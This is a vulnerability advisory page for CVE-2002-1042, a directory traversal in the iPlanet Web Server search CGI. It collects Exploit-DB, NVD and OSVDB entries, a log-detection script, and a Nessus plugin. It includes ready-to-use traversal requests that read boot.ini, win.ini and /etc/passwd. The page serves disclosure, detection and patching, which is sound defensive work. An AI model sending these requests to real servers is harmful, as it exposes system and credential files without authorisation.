iPlanet Web Server 4.1 - Search Component File Disclosure Vulnerability
Published: 2002-07-09T00:00:00
ID: EDB-ID:21603
Type: exploitdb
Reporter: Qualys Corporation
Modified: 2002-07-09T00:00:00
Description
iPlanet Web Server 4.1 Search Component File Disclosure Vulnerability. CVE-2002-1042. Remote exploit for multiple platforms.
source: http://www.securityfocus.com/bid/5191/info
The iPlanet Web Server search engine is prone to a file disclosure vulnerability. It is possible for remote attackers to make requests to the search engine which will cause arbitrary readable files on the host running the vulnerable software to be disclosed to the attacker.
This issue was reported for iPlanet Web Server on Microsoft Windows operating systems. Since the server typically runs in the SYSTEM context on these operating systems, it may be possible for an attacker to disclose the contents of arbitrary files. It has not been confirmed whether this vulnerability exists on other platforms that the software is compatible with. The search engine functionality does not appear to be available for versions of the software on Linux platforms.
GET /search?NS-query-pat=..\..\..\..\..\boot.ini
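A detection sketch for the request pattern described above, as an added example that is not part of the original advisory: it scans web access-log lines for /search requests whose NS-query-pat value contains a dot-dot path segment after repeated URL-decoding. The log lines, the function names and the five-round decode limit are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in Common Log Format (not real traffic).
SAMPLE_LOG = [
    r'192.0.2.10 - - [09/Jul/2002:10:00:01 +0000] "GET /search?NS-query-pat=..\..\..\..\..\boot.ini HTTP/1.0" 200 512',
    r'192.0.2.11 - - [09/Jul/2002:10:00:05 +0000] "GET /search?NS-query-pat=%2e%2e%5c%2e%2e%5cboot.ini HTTP/1.0" 200 512',
    r'192.0.2.12 - - [09/Jul/2002:10:00:09 +0000] "GET /search?NS-query-pat=%252e%252e%255cwinnt%255cwin.ini HTTP/1.0" 404 0',
    r'192.0.2.13 - - [09/Jul/2002:10:00:12 +0000] "GET /search?NS-query-pat=/text/query.pat HTTP/1.0" 200 2048',
    r'192.0.2.14 - - [09/Jul/2002:10:00:15 +0000] "GET /index.html HTTP/1.0" 200 1024',
]

REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')
MAX_DECODE_ROUNDS = 5  # assumption: enough to unwrap nested %25 encodings

def fully_decode(value):
    """URL-decode repeatedly until the value stops changing."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(value):
    """True if any path segment is '..'; backslash and slash both count as separators."""
    return ".." in fully_decode(value).replace("\\", "/").split("/")

def find_traversal_attempts(lines):
    """Return (client, status, decoded value) for each suspicious /search request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if fully_decode(path).lower().rstrip("/") != "/search":
            continue
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            if unquote(name) == "NS-query-pat" and has_traversal(value):
                hits.append((m.group("client"), int(m.group("status")), fully_decode(value)))
    return hits

if __name__ == "__main__":
    for client, status, value in find_traversal_attempts(SAMPLE_LOG):
        print(f"{client} status={status} NS-query-pat={value}")
```

A hit logged with status 200 deserves review first, since the server returned content for the traversal request.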
Related records

CVE-2002-1042 (NVD; published 2002-10-04, modified 2008-09-05)
Directory traversal vulnerability in search engine for iPlanet web server 6.0 SP2 and 4.1 SP9, and Netscape Enterprise Server 3.6, when running on Windows platforms, allows remote attackers to read arbitrary files via ..\ (dot-dot backslash) sequences in the NS-query-pat parameter.
CVSS v2: 5.0 (MEDIUM), AV:N/AC:L/Au:N/C:P/I:N/A:N; exploitability score 10.0, impact score 2.9
CWE: NVD-CWE-Other
Affected products (CPE): cpe:/a:sun:iplanet_web_server:4.1, cpe:/a:sun:one_application_server:6.0, cpe:/a:sun:one_web_server:6.0, cpe:/a:netscape:enterprise_server:3.6
Link: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1042

OSVDB:846: iPlanet/One Web Server search Arbitrary File Access (published 2002-07-09)
CVSS: 5.0, AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE
Link: https://vulners.com/osvdb/OSVDB:846

Vulnerability Description
iPlanet/One Web Server contains a flaw that allows a remote attacker to access arbitrary files outside of the web path. The issue is due to the "search" script not properly sanitizing user input, specifically traversal style attacks (../../) supplied via the "NS-query-pat" variable.

Solution Description
Upgrade to iPlanet Web Server 4.1 Service Pack 11 or Sun ONE Web Server 6.0 Service Pack 4, as it has been reported to fix this vulnerability. Administrators may also disable or remove the search feature.

Manual Testing Notes
http://[victim]/search?NS-query-pat=..\..\..\..\..\boot.ini

References
Vendor Specific Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F46127
Snort Signature ID: 1828
Other Advisory URL: http://www.cgisecurity.net/archive/webservers/iplanet_search-option-remote_file_viewing.txt
Nessus Plugin ID: 11043 (https://vulners.com/search?query=pluginID:11043)
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-07/0085.html
Keyword: Directory Traversal
ISS X-Force ID: 9517
CVE-2002-1042 (https://vulners.com/cve/CVE-2002-1042)
Bugtraq ID: 5191

Nessus IPLANET_SEARCH.NASL: iPlanet Search Engine search CGI Arbitrary File Access (published 2002-07-10, modified 2021-01-02)
An attacker may be able to read arbitrary files on the remote web server, using the 'search' CGI that comes with iPlanet.
CVSS: 5.0, AV:N/AC:L/Au:N/C:P/I:N/A:N
Link: https://www.tenable.com/plugins/nessus/11043

Plugin source:

```
#
# (C) Tenable Network Security, Inc.
#

# Script audit and contributions from Carmichael Security
# Erik Anderson <eanders@carmichaelsecurity.com>
# Added BugtraqID and CAN
#


include("compat.inc");

if (description)
{
 script_id(11043);
 script_version("1.28");
 script_cvs_date("Date: 2018/11/15 20:50:25");

 script_cve_id("CVE-2002-1042");
 script_bugtraq_id(5191);

 script_name(english:"iPlanet Search Engine search CGI Arbitrary File Access");
 script_summary(english:"Attempts to read an arbitrary file using a feature in iPlanet");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server is hosting a CGI application that is affected
by an information disclosure vulnerability.");
 script_set_attribute(attribute:"description", value:
"An attacker may be able to read arbitrary files on the remote web 
server, using the 'search' CGI that comes with iPlanet.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Jul/85");
 script_set_attribute(attribute:"solution", value:
"Upgrade to iPlanet Web Server 4.1 Service Pack 11 or Sun ONE Web 
Server 6.0 Service Pack 4, as it has been reported to fix this 
vulnerability.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value:"2002/07/10");
 script_set_attribute(attribute:"vuln_publication_date", value:"2002/07/09");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_ATTACK);

 script_copyright(english:"This script is Copyright (C) 2002-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
 script_family(english:"Web Servers");

 script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80);


function check(item, exp)
{
 local_var res, r, r2;
 res = http_send_recv3(method:"GET", item:item, port:port);
 if (isnull(res)) exit(1, "The web server on port "+port+" failed to respond.");

 if(egrep(string:res[2], pattern:exp, icase:1)){
   r2 = strstr(res[1], '\r\n\r\n');
   if (strlen(r2) == 0) r2 = res[2];
   else r2 -= '\r\n\r\n';
   r2 = data_protection::redact_etc_passwd(output:r2);
   r = strcat('\n', build_url(port: port, qs: item),
     '\nrevealed the content of a protected file :\n', r2, '\n');
   security_warning(port:port, extra: r);
   exit(0);
 }
 return(0);
}


check(item:"/search?NS-query-pat=..\..\..\..\..\..\..\..\winnt\win.ini", exp:"\[fonts\]");
check(item:"/search?NS-query-pat=../../../../../../../../../etc/passwd", exp:"root:.*:0:[01]:.*");
```